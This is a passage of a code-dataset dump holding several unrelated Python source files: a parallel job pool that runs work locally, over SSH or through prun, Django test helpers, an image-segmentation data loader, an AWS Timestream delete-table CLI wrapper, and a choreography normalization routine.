time.sleep(self.poll_interval)\n\n def run(\n self,\n ctx: Context,\n cmd: Union[str, Iterable[str]],\n jobid: str,\n outfile: str,\n nnodes: int,\n onsuccess: Optional[Callable[[Job], None]] = None,\n onerror: Optional[Callable[[Job], None]] = None,\n **kwargs: Any,\n ) -> 
Iterable[Job]:\n \"\"\"\n A non-blocking wrapper for :func:`util.run`, to be used when\n ``--parallel`` is specified.\n\n :param ctx: the configuration context\n :param cmd: the command to run\n :param jobid: a human-readable ID for status reporting\n :param outfile: full path to target file for command output\n :param nnodes: number of cores or machines to run the command on\n :param onsuccess: callback when the job finishes successfully\n :param onerror: callback when the job exits with (typically I/O) error\n :param kwargs: passed directly to :func:`util.run`\n :returns: handles to created job processes\n \"\"\"\n # TODO: generate outfile from jobid\n self._start_poller()\n\n if isinstance(cmd, str):\n cmd = shlex.split(cmd)\n\n jobs = []\n\n for job in self.make_jobs(ctx, cmd, jobid, outfile, nnodes, **kwargs):\n job.onsuccess = onsuccess\n job.onerror = onerror\n job.output = \"\"\n self.jobs[job.proc.stdout_io.fileno()] = job\n self.poller.register(\n job.proc.stdout_io,\n select.EPOLLIN | select.EPOLLPRI | select.EPOLLERR | select.EPOLLHUP,\n )\n jobs.append(job)\n\n return jobs\n\n def onsuccess(self, job: Job) -> None:\n # don't log if onsuccess() returns False\n if not job.onsuccess or job.onsuccess(job) is not False:\n self.log.info(f\"job {job.jobid} finished {self._get_elapsed(job)}\")\n self.log.debug(f\"command: {job.proc.cmd_str}\")\n\n def onerror(self, job: Job) -> None:\n # don't log if onerror() returns False\n if not job.onerror or job.onerror(job) is not False:\n self.log.error(\n f\"job {job.jobid} returned status {job.proc.returncode} \"\n f\"{self._get_elapsed(job)}\"\n )\n self.log.error(f\"command: {job.proc.cmd_str}\")\n sys.stdout.write(job.output)\n\n def _get_elapsed(self, job: Job) -> str:\n elapsed = round(time.time() - job.start_time)\n return f\"after {elapsed} seconds\"\n\n\nclass ProcessPool(Pool):\n def make_jobs(\n self,\n ctx: Context,\n cmd: Union[str, Iterable[str]],\n jobid_base: str,\n outfile_base: str,\n nnodes: int,\n **kwargs: Any,\n ) -> Iterator[Job]:\n for i in range(nnodes):\n jobid = jobid_base\n outfile = outfile_base\n if nnodes > 1:\n jobid += f\"-{i}\"\n outfile += f\"-{i}\"\n\n self._wait_for_queue_space(1)\n ctx.log.info(\"running \" + jobid)\n\n proc = run(\n ctx,\n cmd,\n defer=True,\n stderr=STDOUT,\n bufsize=io.DEFAULT_BUFFER_SIZE,\n universal_newlines=False,\n **kwargs,\n )\n _set_non_blocking(proc.stdout_io)\n os.makedirs(os.path.dirname(outfile), exist_ok=True)\n job = ProcessJob(proc, jobid, [outfile], open(outfile, \"wb\"))\n\n yield job\n\n def process_job_output(self, job: Job) -> None:\n assert isinstance(job, ProcessJob)\n buf = job.stdout.read(io.DEFAULT_BUFFER_SIZE)\n if buf is not None:\n job.output += buf.decode(\"ascii\", errors=\"replace\")\n job.outfile_handle.write(buf)\n\n def onsuccess(self, job: Job) -> None:\n assert isinstance(job, ProcessJob)\n job.outfile_handle.close()\n super().onsuccess(job)\n\n def onerror(self, job: Job) -> None:\n assert isinstance(job, ProcessJob)\n job.outfile_handle.close()\n super().onerror(job)\n\n\nclass SSHPool(Pool):\n \"\"\"\n An SSHPool runs jobs on remote nodes via ssh.\n\n The --ssh-nodes argument specified a list of ssh hosts to distribute the\n work over. These hosts are passed as-is to the ssh command; the best way for\n specifying alternative ssh ports, user, and other options is to add your\n hosts to the ~/.ssh/config file. 
Additionally, make sure the hosts can be\n reached without password prompts (e.g., by using passphrase-less keys or\n using an ssh agent).\n\n For targets that are being run via an SSHPool additional functionality is\n available, such as distributing files to/from nodes.\n \"\"\"\n\n ssh_opts = [\n # Block stdin and background ssh before executing command.\n \"-f\",\n # Eliminate some of the yes/no questions ssh may ask.\n \"-oStrictHostKeyChecking=accept-new\",\n ]\n scp_opts = [\n # Quiet mode to disable progress meter\n \"-q\",\n # Batch mode to prevent asking for password\n \"-B\",\n # Copy directories\n \"-r\",\n ]\n\n _tempdir: Optional[str]\n\n def __init__(\n self, ctx: Context, logger: logging.Logger, parallelmax: int, nodes: List[str]\n ):\n if parallelmax > len(nodes):\n raise FatalError(\n \"parallelmax cannot be greater than number of available nodes\"\n )\n super().__init__(logger, parallelmax)\n self._ctx = ctx\n self.nodes = nodes[:]\n self.available_nodes = nodes[:]\n self.has_tested_nodes = False\n self.has_created_tempdirs = False\n\n @property\n def tempdir(self) -> str:\n if not self.has_created_tempdirs:\n self.create_tempdirs()\n assert self._tempdir is not None\n return self._tempdir\n\n def _ssh_cmd(\n self,\n node: str,\n cmd: Union[str, Iterable[str]],\n extra_opts: Optional[Sequence[Any]] = None,\n ) -> List[str]:\n if not isinstance(cmd, str):\n cmd = \" \".join(shlex.quote(str(c)) for c in cmd)\n extra_opts = extra_opts or []\n return [\"ssh\", *self.ssh_opts, *extra_opts, node, cmd]\n\n def test_nodes(self) -> None:\n if self.has_tested_nodes:\n return\n for node in self.nodes:\n cmd = [\"ssh\", *self.ssh_opts, node, \"echo -n hi\"]\n p = run(self._ctx, cmd, stderr=STDOUT, silent=True)\n if p.returncode or not str(p.stdout).endswith(\"hi\"):\n self._ctx.log.error(\n \"Testing SSH node \" + node + \" failed:\\n\" + p.stdout\n )\n sys.exit(-1)\n self.has_tested_nodes = True\n\n def create_tempdirs(self) -> None:\n if self.has_created_tempdirs:\n return\n\n self.test_nodes()\n\n starttime = self._ctx.starttime.strftime(\"%Y-%m-%d.%H-%M-%S\")\n self._tempdir = os.path.join(\"/tmp\", \"infra-\" + starttime)\n\n self._ctx.log.debug(\n f\"creating SSHPool temp dir {self._tempdir} on nodes {self.nodes}\"\n )\n\n for node in self.nodes:\n run(self._ctx, self._ssh_cmd(node, [\"mkdir\", \"-p\", self._tempdir]))\n\n self.has_created_tempdirs = True\n\n def cleanup_tempdirs(self) -> None:\n if not self.has_created_tempdirs:\n return\n assert self._tempdir is not None\n self._ctx.log.debug(\n f\"cleaning up SSHPool temp directory {self._tempdir} on nodes {self.nodes}\"\n )\n for node in self.nodes:\n run(self._ctx, self._ssh_cmd(node, [\"rm\", \"-rf\", self._tempdir]))\n self.has_created_tempdirs = False\n self._tempdir = None\n\n def sync_to_nodes(\n self,\n sources: Union[str, Iterable[str]],\n destination: str = \"\",\n target_nodes: Optional[Union[str, Iterable[str]]] = None,\n ) -> None:\n if isinstance(sources, str):\n sources = [sources]\n if isinstance(target_nodes, str):\n target_nodes = [target_nodes]\n nodes = target_nodes or self.nodes\n self._ctx.log.debug(\n f\"syncing file to SSHPool nodes, sources={sources},\"\n f\"destination={destination}, nodes={nodes}\"\n )\n for node in nodes:\n dest = f\"{node}:{os.path.join(self.tempdir, destination)}\"\n cmd = [\"scp\", *self.scp_opts, *sources, dest]\n run(self._ctx, cmd)\n\n def sync_from_nodes(\n self,\n source: str,\n destination: str = \"\",\n source_nodes: Optional[Sequence[str]] = None,\n ) -> None:\n if 
isinstance(source_nodes, str):\n source_nodes = [source_nodes]\n nodes = source_nodes or self.nodes\n\n self._ctx.log.debug(\n f\"syncing file from SSHPool nodes, source={source},\"\n f\"destination={destination}, nodes={nodes}\"\n )\n\n for i, node in enumerate(nodes):\n dest = destination or os.path.basename(source)\n if len(nodes) > 1:\n dest += \".\" + node\n if len(nodes) != len(set(nodes)):\n dest = f\"{dest}{i}\"\n src = f\"{node}:{os.path.join(self.tempdir, source)}\"\n cmd = [\"scp\", *self.scp_opts, src, dest]\n run(self._ctx, cmd)\n\n def get_free_node(self, override_node: Optional[str] = None) -> str:\n if override_node:\n assert override_node in self.nodes\n assert override_node in self.available_nodes\n self.available_nodes.remove(override_node)\n return override_node\n else:\n return self.available_nodes.pop()\n\n def make_jobs(\n self,\n ctx: Context,\n cmd: Union[str, Iterable[str]],\n jobid_base: str,\n outfile_base: str,\n nnodes: int,\n nodes: Optional[Union[str, List[str]]] = None,\n tunnel_to_nodes_dest: Optional[int] = None,\n **kwargs: Any,\n ) -> Iterator[Job]:\n if isinstance(nodes, str):\n nodes = [nodes]\n\n self.test_nodes()\n\n for i in range(nnodes):\n jobid = jobid_base\n outfile = outfile_base\n if nnodes > 1:\n jobid += f\"-{i}\"\n outfile += f\"-{i}\"\n\n self._wait_for_queue_space(1)\n override_node = nodes[i] if nodes else None\n node = self.get_free_node(override_node)\n ctx.log.info(\"running \" + jobid + \" on \" + node)\n\n ssh_node_opts = []\n tunnel_src = None\n if tunnel_to_nodes_dest:\n tunnel_src = random.randint(10000, 30000)\n ssh_node_opts += [\n f\"-Llocalhost:{tunnel_src}:0.0.0.0:{tunnel_to_nodes_dest}\"\n ]\n\n ssh_cmd = self._ssh_cmd(node, cmd, ssh_node_opts)\n proc = run(\n ctx,\n ssh_cmd,\n defer=True,\n stderr=STDOUT,\n bufsize=io.DEFAULT_BUFFER_SIZE,\n universal_newlines=False,\n **kwargs,\n )\n _set_non_blocking(proc.stdout_io)\n\n os.makedirs(os.path.dirname(outfile), exist_ok=True)\n job = SSHJob(proc, jobid, [outfile], open(outfile, \"wb\"), node)\n\n if tunnel_to_nodes_dest:\n job.tunnel_src = tunnel_src\n job.tunnel_dest = tunnel_to_nodes_dest\n\n yield job\n\n def process_job_output(self, job: Job) -> None:\n assert isinstance(job, SSHJob)\n buf = job.stdout.read(io.DEFAULT_BUFFER_SIZE)\n if buf is not None:\n job.output += buf.decode(\"ascii\", errors=\"replace\")\n job.outfile_handle.write(buf)\n\n def onsuccess(self, job: Job) -> None:\n assert isinstance(job, SSHJob)\n job.outfile_handle.close()\n self.available_nodes.append(job.node)\n super().onsuccess(job)\n\n def onerror(self, job: Job) -> None:\n assert isinstance(job, SSHJob)\n self.available_nodes.append(job.node)\n job.outfile_handle.close()\n super().onerror(job)\n\n\nclass PrunPool(Pool):\n default_job_time = 900 # if prun reserves this amount, it is not logged\n\n def __init__(\n self, logger: logging.Logger, parallelmax: int, prun_opts: Iterable[str]\n ):\n super().__init__(logger, parallelmax)\n self.prun_opts = prun_opts\n\n def make_jobs(\n self,\n ctx: Context,\n cmd: Union[str, Iterable[str]],\n jobid_base: str,\n outfile_base: str,\n nnodes: int,\n **kwargs: Any,\n ) -> Iterator[Job]:\n require_program(ctx, \"prun\")\n self._wait_for_queue_space(nnodes)\n ctx.log.info(\"scheduling \" + jobid_base)\n cmd = [\n \"prun\",\n \"-v\",\n \"-np\",\n str(nnodes),\n \"-1\",\n \"-o\",\n outfile_base,\n *self.prun_opts,\n *cmd,\n ]\n proc = run(\n ctx,\n cmd,\n defer=True,\n stderr=STDOUT,\n bufsize=0,\n universal_newlines=False,\n **kwargs,\n )\n 
_set_non_blocking(proc.stdout_io)\n outfiles = [f\"{outfile_base}.{i}\" for i in range(nnodes)]\n job = PrunJob(proc, jobid_base, outfiles, nnodes)\n yield job\n\n def process_job_output(self, job: Job) -> None:\n assert isinstance(job, PrunJob)\n\n def group_nodes(\n nodes: Sequence[Tuple[int, int]]\n ) -> List[Tuple[List[int], List[int]]]:\n groups = [([m], [c]) for m, c in sorted(nodes)]\n for i in range(len(groups) - 1, 0, -1):\n lmachines, lcores = groups[i - 1]\n rmachines, rcores = groups[i]\n if lmachines == rmachines and lcores[-1] + 1 == rcores[0]:\n groups[i - 1] = lmachines, lcores + rcores\n del groups[i]\n elif (\n len(lcores) == 1\n and lmachines[-1] + 1 == rmachines[0]\n and lcores == rcores\n ):\n groups[i - 1] = lmachines + rmachines, lcores\n del groups[i]\n return groups\n\n def stringify_groups(groups: List[Tuple[List[int], List[int]]]) -> str:\n samecore = set(c for m, cores in groups for c in cores) == set([0])\n\n def join(n: Sequence[Any], fmt: str) -> str:\n if len(n) == 1:\n return fmt % n[0]\n else:\n return fmt % n[0] + \"-\" + fmt % n[-1]\n\n if samecore:\n # all on core 0, omit it\n groupstrings = (join(m, \"%03d\") for m, c in groups)\n else:\n # different cores, add /N suffix\n groupstrings = (f\"{join(m, '%03d')}/{join(c, '%d')}\" for m, c in groups)\n\n if len(groups) == 1:\n m, c = groups[0]\n if len(m) == 1 and len(c) == 1:\n return \"node\" + next(groupstrings)\n\n return f\"node[{','.join(groupstrings)}]\"\n\n buf = job.stdout.read(1024)\n if buf is None:\n return\n\n job.output += buf.decode(\"ascii\")\n\n if job.logged:\n return\n\n numseconds = None\n nodes: List[Tuple[int, int]] = []\n\n for line in job.output.splitlines():\n if line.startswith(\":\"):\n for m in re.finditer(r\"node(\\d+)/(\\d+)\", line):\n nodes.append((int(m.group(1)), int(m.group(2))))\n elif numseconds is None:\n match = re.search(r\"for (\\d+) seconds\", line)\n if match:\n numseconds = int(match.group(1))\n\n if len(nodes) == job.nnodes:\n assert numseconds is not None\n nodestr = stringify_groups(group_nodes(nodes))\n self.log.info(f\"running {job.jobid} on {nodestr}\")\n job.start_time = time.time()\n job.logged = True\n\n\ndef _set_non_blocking(f: IO) -> None:\n flags = fcntl.fcntl(f, fcntl.F_GETFL)\n fcntl.fcntl(f, fcntl.F_SETFL, flags | os.O_NONBLOCK)\n","sub_path":"infra/parallel.py","file_name":"parallel.py","file_ext":"py","file_size_in_byte":21471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"289746343","text":"\"\"\"\nTest cases for frontend.\n\"\"\"\nimport unittest\n\nfrom django.test import TestCase\nfrom server.errors import FsimError\n\nfrom utils import Status\nfrom utils.typecheck import ensure_type\n\n\ndef assertStatusRegex(self, regex_status, status_object):\n \"\"\"\n Asserts that status_object.payload matches the regex_status.payload and that both\n have the same status type.\n\n regex_status.payload can be either an FsimError or an regex expression (as a\n string).\n\n Exceptions\n ----------\n TypeException: if regex_status or status_object are not Status objects or if the payload is not a string.\n \"\"\"\n ensure_type(\"regex_status\", regex_status, Status)\n ensure_type(\"status_object\", status_object, Status)\n\n ensure_type(\"status_object.payload\", status_object.payload, str)\n ensure_type(\n \"regex_status.payload\",\n status_object.payload,\n str,\n FsimError,\n FsimError.__class__,\n )\n\n if isinstance(regex_status.payload, FsimError) or isinstance(\n regex_status.payload, 
FsimError.__class__):\n regex_string = regex_status.payload.regex_string()\n elif isinstance(regex_status.payload, str):\n regex_string = regex_status.payload\n\n self.assertEqual(regex_status.status, status_object.status)\n self.assertRegex(status_object.payload, regex_string)\n\n\nclass StatusTestCase(TestCase):\n \"\"\"\n Provides functions to compare status objects.\n \"\"\"\n\n assertStatusRegex = assertStatusRegex\n\n\nclass SchedulerTestCase(unittest.TestCase):\n \"\"\"\n Testcase for the `Scheudler` which provides an addiational comparison.\n \"\"\"\n\n assertStatusRegex = assertStatusRegex\n\n def assertStatusSet(self, first, second):\n \"\"\"\n Asserts that two arrays of `Status` are equal by the defintion of a\n set.\n\n Arguments\n ---------\n first: list of Status\n First operand\n second: list of Status\n Second operand\n\n Raises\n ------\n AssertionError:\n If an element is found which does not belong the the list.\n \"\"\"\n\n self.assertTrue(len(first), len(second))\n\n no_fit = []\n\n for x in first:\n if x in second:\n second.remove(x)\n else:\n no_fit.append(x)\n\n if len(second) > 0:\n raise AssertionError((\"The elements {} does not have an\"\n \"counterpart. Leftovers: {}\").format(\n no_fit, second))\n","sub_path":"frontend/tests/testcases.py","file_name":"testcases.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"523505178","text":"import cv2\nfrom glob import glob\nimport os\nimport numpy as np\nimport random\nimport matplotlib.pyplot as plt\nfrom keras.utils import to_categorical\n\n# Color (BGR) to class\nINV_LABELMAP_DEER = {\n\t(0, 0, 128) : 0,\n\t(0, 0, 0) : 1,\n\t(0, 128, 0) : 2,\n\t(0, 128, 128) : 3,\n}\n\nCOLORS = [k for k, v in INV_LABELMAP_DEER.items()]\n\nclass DataLoader():\n\tdef __init__(self, dataset_name, img_res=(128, 128)):\n\t\tself.dataset_name = dataset_name\n\t\tself.img_res = img_res\n\n\tdef load_data(self, batch_size=1, is_testing=False):\n\t\tdata_type = \"train\" if not is_testing else \"test\"\n\t\tif is_testing:\n\t\t\tpath = glob('./datasets/%s/%s/*' % (self.dataset_name, data_type))\n\t\telse:\n\t\t\tpath = glob('./datasets/%s/%s/images/*' % (self.dataset_name, data_type))\n\n\t\tbatch_images = np.random.choice(path, size=batch_size)\n\n\t\timgs_A = []\n\t\timgs_B = []\n\t\timgs = []\n\t\tfor img_path in batch_images:\n\t\t\timg = self.imread(img_path)\n\n\t\t\th, w, _ = img.shape\n\t\t\t_w = int(w/2)\n\t\t\timg_B, img_A = img[:, :_w, :], img[:, _w:, :]\n\t\t\t# img = self.imread(os.path.join(img_path))\n\n\t\t\timgs_A.append(img_A)\n\t\t\timgs_B.append(img_B)\n\t\t\timgs.append(img_A)\n\n\t\t# imgs_A = np.array(imgs_A)/127.5 - 1.\n\t\timgs_B = np.array(imgs_B)/127.5 - 1.\n\n\t\treturn imgs_A, imgs_B, imgs\n\n\tdef load_batch(self, batch_size=1, is_testing=False):\n\t\tdata_type = \"train\" if not is_testing else \"val\"\n\t\tpath = glob('./datasets/%s/%s/images/*' % (self.dataset_name, data_type))\n\n\t\tself.n_batches = int(len(path) / batch_size)\n\n\t\tfor i in range(self.n_batches-1):\n\t\t\tbatch = path[i*batch_size:(i+1)*batch_size]\n\t\t\timgs_A, imgs_B, imgs = [], [], []\n\t\t\tfor img in batch:\n\t\t\t\t# img = self.imread(img)\n\t\t\t\t# h, w, _ = img.shape\n\t\t\t\t# half_w = int(w/2)\n\t\t\t\timg_B = self.imread(img)\n\t\t\t\timg_B = cv2.resize(img_B, self.img_res)\n\t\t\t\tfilename = img.split('/')\n\t\t\t\tlabel_filename = filename[len(filename) - 1]\n\t\t\t\tlabel_filename = 
'extra-'.join(label_filename.split('extra'))\n\t\t\t\tlabel_path = os.path.join(\"datasets\", self.dataset_name, data_type, \"labels\", label_filename)\n\t\t\t\tif os.path.exists(label_path):\n\t\t\t\t\timg_input = self.imread(label_path)\n\t\t\t\t\timg_input = np.array(cv2.resize(img_input, self.img_res))\n\t\t\t\t\timg_A = np.zeros((img_input.shape[0], img_input.shape[1], 4))\n\t\t\t\t\tfor i in range(0, img_input.shape[0]):\n\t\t\t\t\t\tfor j in range(0, img_input.shape[1]):\n\t\t\t\t\t\t\ta = np.zeros((1, 4))\n\t\t\t\t\t\t\tarr = np.array(COLORS) - tuple(img_input[i,j,:])\n\t\t\t\t\t\t\tindex = np.argmin(np.sum(np.abs(arr), axis=1))\n\t\t\t\t\t\t\ta[0][index] = 1 \n\t\t\t\t\t\t\timg_A[i, j, :] = a.astype(np.uint8)\n\t\t\t\t\timgs.append(self.imread(label_path))\n\t\t\t\telse:\n\t\t\t\t\timg_A = np.zeros((img_B.shape[0], img_B.shape[1], 4)) * (-1)\n\t\t\t\t\timgs.append('')\n\t\t\t\t# img_A = to_categorical(img_input[:, :, 0], 4)\n\n\t\t\t\tif not is_testing and np.random.random() > 0.5:\n\t\t\t\t\t\timg_A = np.fliplr(img_A)\n\t\t\t\t\t\timg_B = np.fliplr(img_B)\n\n\t\t\t\timgs_A.append(img_A)\n\t\t\t\timgs_B.append(img_B)\n\n\t\t\t# imgs_A = np.array(imgs_A)/127.5 - 1.\n\t\t\timgs_B = np.array(imgs_B)/127.5 - 1.\n\n\t\t\tyield imgs_A, imgs_B, imgs\n\n\n\tdef imread(self, path):\n\t\treturn cv2.imread(path).astype(np.float)\n","sub_path":"data_loader.py","file_name":"data_loader.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"613876808","text":"#!/usr/bin/python\n# -*- codding: utf-8 -*-\nimport os\nimport sys\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom common.execute_command import write_two_parameter\n\n# url : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/timestream-write/delete-table.html\nif __name__ == '__main__':\n \"\"\"\n\tcreate-table : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/timestream-write/create-table.html\n\tdescribe-table : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/timestream-write/describe-table.html\n\tlist-tables : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/timestream-write/list-tables.html\n\tupdate-table : https://awscli.amazonaws.com/v2/documentation/api/latest/reference/timestream-write/update-table.html\n \"\"\"\n\n parameter_display_string = \"\"\"\n # database-name : The name of the database where the Timestream database is to be deleted.\n # table-name : The name of the Timestream table to be deleted.\n \"\"\"\n add_option_dict = {}\n add_option_dict[\"parameter_display_string\"] = parameter_display_string\n # ex: add_option_dict[\"no_value_parameter_list\"] = \"--single-parameter\"\n write_two_parameter(\"timestream-write\", \"delete-table\", \"database-name\", \"table-name\", add_option_dict)\n","sub_path":"timestream-write_write_2/table_delete.py","file_name":"table_delete.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"33825550","text":"from copy import copy\nfrom sympy import S\nfrom minimize import *\nfrom parser_chor import *\nfrom ast_chor import *\nfrom ast_proj import *\nimport logging\n\nlog = logging.getLogger(\"Normalization\")\n\ndef removeForkJoin(nameGen, choreography, state_to_node):\n # if there are nested forks then we should work inside out\n def noForkBeforeJoin(state, first = True):\n node = 
state_to_node[state]\n if isinstance(node, Fork) and not first:\n return False\n elif isinstance(node, Join):\n return True\n else:\n return all([noForkBeforeJoin(s, False) for s in node.end_state])\n # find the predecessor of a state\n def findPred(state):\n for node in state_to_node.values():\n if isinstance(node, GuardedChoice):\n for i, val in enumerate(node.guarded_states):\n if val.id == state:\n return node, i\n else:\n for i, val in enumerate(node.end_state):\n if val == state:\n return node, i\n def findMp(state):\n node = state_to_node[state]\n if isinstance(node, Motion):\n return [state]\n else:\n return [ s for succ in node.end_state for s in findMp(succ) ]\n def hasAction(state, first = True):\n node = state_to_node[state]\n if isinstance(node, Motion):\n return True\n elif isinstance(node, SendMessage) or isinstance(node, GuardedChoice) or isinstance(node, ReceiveMessage):\n return True\n elif isinstance(node, Join):\n return first\n else:\n return any(hasAction(s, False) for s in node.end_state)\n # pull together the motion primitives\n # takes a list of threads and generate the permutation of events\n # TODO diverge in case of loop within fork-join\n def mergeThreads(pred, pred_index, pendingMotion, states):\n log.debug(\" pred: %s @ %s\", pred, pred_index)\n log.debug(\" states: %s\", states)\n log.debug(\" pendingMotion: %s\", pendingMotion)\n states = [ s for s in states if hasAction(s) ]\n log.debug(\" relevant states: %s\", states)\n #first step categorise the next event\n internal = []\n external = []\n motion = []\n send = []\n receive = []\n join = []\n merge = []\n for s in states:\n node = state_to_node[s]\n if isinstance(node, GuardedChoice):\n internal.append(s)\n elif isinstance(node, ExternalChoice):\n external.append(s)\n elif isinstance(node, Motion):\n motion.append(s)\n elif isinstance(node, SendMessage):\n send.append(s)\n elif isinstance(node, ReceiveMessage):\n receive.append(s)\n elif isinstance(node, Merge):\n merge.append(s)\n elif isinstance(node, Join):\n join.append(s)\n else:\n raise Exception(\"mergeThreads: \" + str(node))\n if len( { state_to_node[n].end_state[0] for n in join} ) > 1:\n raise Exception(\"mergeThreads ambiguous join \" + str(join))\n # skip the merge\n if len(merge) > 0:\n merged = list({ m.end_state[0] for m in merge })\n states = internal + external + motion + send + receive + merged + join\n return mergeThreads(pred, pred_index, pendingMotion, states)\n # merge the internal\n if len(internal) > 0:\n #FIXME this does not look right. it should be the combinations ?!? 
(2ⁿ)\n newIntId = nameGen.get_artificial_name()\n guards = [ g for i in internal for g in i.get_successors(state_to_node) ]\n newInt = GuardedChoice([newInt], guards)\n internal = [newIntId]\n state_to_node[newIntId] = newInt\n # merge the external choices (temporary allow multiple motions in parallel)\n if len(external) + len(receive) + min(1, len(motion)) > 1: #all the motion are 1 choice (TO)\n newExtId = nameGen.get_artificial_name()\n nodes = [ e for n in external for e in state_to_node[n].end_state ] + [ state_to_node[r].start_state[0] for r in receive ] + [ state_to_node[m].start_state[0] for m in motion ]\n newExt = ExternalChoice([newExtId], nodes)\n external = [newExtId]\n receive = []\n motion = []\n state_to_node[newExtId] = newExt\n # check for conflicts\n if len(internal) + len(send) > 0 and len(external) + len(receive) > 0:\n raise Exception(\"mergeThreads, internal/external choice conflit: \" + (internal+send) + \", \" + (external+receive))\n # at that point there is not much choice left, we should be either internal, send, external, or motion\n msgAlternatives = internal + send + external + receive\n assert len(msgAlternatives) <= 2\n if len(msgAlternatives) == 0:\n # not 0-time event, let's move or we are done\n if len(motion) > 0:\n assert len(join) == 0, \"motion \" + str(motion) + \", join \" + str(join)\n motion.extend(pendingMotion)\n #TODO a bit too specialized\n goodOnes = [ m for m in motion if not isPlaceholderMp(state_to_node[m].motions[0]) ]\n assert len(goodOnes) == 1, \"no real motion: \" + str(motion)\n mp = copy(state_to_node[goodOnes.pop()])\n newId = nameGen.get_artificial_name()\n mp.start_state[0] = newId\n pred.end_state[pred_index] = newId\n state_to_node[newId] = mp\n successors = [ end for m in motion for end in state_to_node[m].end_state ]\n return mergeThreads(mp, 0, [], successors)\n else:\n assert len(pendingMotion) == 0\n joinTarget = { state_to_node[n].end_state[0] for n in join}\n assert len(joinTarget) == 1\n return [(pred, pred_index)], joinTarget.pop()\n elif len(msgAlternatives) == 1:\n a = state_to_node[msgAlternatives.pop()]\n log.debug(\" next (unique) action: %s\", a)\n a2 = copy(a)\n newId = nameGen.get_artificial_name()\n a2.start_state[0] = newId\n state_to_node[newId] = a2\n #update the predecessor\n pred.end_state[pred_index] = newId\n if isinstance(pred, GuardedChoice):\n pred.guarded_states[pred_index].id = newId\n # continue with the rest ...\n acc = []\n joinAt = None\n pendingMP = pendingMotion\n if isinstance(a2, ExternalChoice):\n mpId = [ s for s in a2.end_state if isinstance(state_to_node[s], Motion) ]\n if len(mpId) > 1:\n reprMP = mpId.pop()\n a2.end_state = [ s for s in a2.end_state if not isinstance(state_to_node[s], Motion) ].append(mpId)\n pendingMP.extend(mpId)\n for i, e in enumerate(a2.end_state):\n lst, j = mergeThreads(a2, i, pendingMP, motion + [e] + join)\n acc.extend(lst)\n if joinAt is None:\n joinAt = j\n else:\n assert(joinAt == j)\n return acc, joinAt\n else:\n # new choice\n newId = nameGen.get_artificial_name()\n choice = GuardedChoice([newId], [GuardArg(S.true(), newId) for x in msgAlternatives])\n state_to_node[newId] = choice\n #update the predecessor\n pred.end_state[pred_index] = newId\n if isinstance(pred, GuardedChoice):\n pred.guarded_states[pred_index].id = newId\n # one action\n acc = []\n joinAt = None\n for i, a in msgAlternatives:\n remaining = copy(msgAlternatives).pop(i)\n a2 = copy(state_to_node[a])\n newId2 = nameGen.get_artificial_name()\n a2.start_state[0] = newId2\n 
                state_to_node[newId2] = a2\n                choice.end_state[i] = newId2\n                choice.guarded_states[i].id = newId2\n                pendingMP = pendingMotion\n                # if next is motion (receive) only one time thing\n                if isinstance(a2, ExternalChoice):\n                    mpId = [ s for s in a2.end_state if isinstance(state_to_node[s], Motion) ]\n                    if len(mpId) > 1:\n                        reprMP = mpId.pop()\n                        # keep one representative motion in the choice, defer the others\n                        a2.end_state = [ s for s in a2.end_state if not isinstance(state_to_node[s], Motion) ] + [reprMP]\n                        pendingMP.extend(mpId)\n                # continue with the rest ...\n                for i, e in enumerate(a2.end_state):\n                    # in case of time, ignore the non-time events\n                    if isinstance(a2, ExternalChoice) and isinstance(state_to_node[e], Motion):\n                        remaining = [ mp for r in remaining for mp in findMp(r) ]\n                    lst, j = mergeThreads(a2, i, pendingMP, remaining + motion + [e] + join)\n                    acc.extend(lst)\n                    if joinAt is None:\n                        joinAt = j\n                    else:\n                        assert(joinAt == j)\n            log.debug(" next choice action: %s", choice)\n            return acc, joinAt\n    # get the fork we need to remove\n    forks = [ state for (state, node) in state_to_node.items() if isinstance(node, Fork) ]\n    # the non-nested ones\n    nonNestedFork = [ s for s in forks if noForkBeforeJoin(s) ]\n    while len(forks) > 0:\n        assert len(nonNestedFork) > 0\n        for s in nonNestedFork:\n            pred, idx = findPred(s)\n            lastIds, join = mergeThreads(pred, idx, [], state_to_node[s].end_state)\n            log.debug(" connecting %s to %s", lastIds, join)\n            # replace the last join by a merge if needed\n            if len(lastIds) == 1:\n                last, idx = lastIds.pop()\n                last.end_state[idx] = join\n            else:\n                merge = Merge([], [join])\n                for pred, index in lastIds:\n                    newId = nameGen.get_artificial_name()\n                    pred.end_state[index] = newId\n                    merge.start_state.append(newId)\n                    # register the merge node under each of its start states\n                    state_to_node[newId] = merge\n        # update work list\n        if log.isEnabledFor(logging.DEBUG):\n            log.debug("after processing: %s", nonNestedFork)\n            for v in state_to_node.values():\n                log.debug("%s", v)\n        forks = [ s for s in forks if not s in nonNestedFork ]\n        nonNestedFork = [ s for s in forks if noForkBeforeJoin(s) ]\n    # remove unreachable node\n    removeUnreachable(choreography, state_to_node)\n\n#to make our life simpler, let us add an external choice before every receive\ndef addExternalChoice(nameGen, choreography, state_to_node):\n    recv = [ node.start_state[0] for node in choreography.statements if isinstance(node, ReceiveMessage) ]\n    needChoice = [ node for node in choreography.statements if not isinstance(node, ExternalChoice) and any(n in recv for n in node.end_state) ]\n    for node in needChoice:\n        for i, succ in enumerate(node.end_state):\n            if succ in recv:\n                name = nameGen.get_artificial_name()\n                newExt = ExternalChoice([name], [succ])\n                state_to_node[name] = newExt\n                choreography.statements.add(newExt)\n                node.end_state[i] = name\n                if isinstance(node, GuardedChoice):\n                    node.guarded_states[i].id = name\n","sub_path":"pgcd/nodes/verification/choreography/normalization.py","file_name":"normalization.py","file_ext":"py","file_size_in_byte":11694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"}
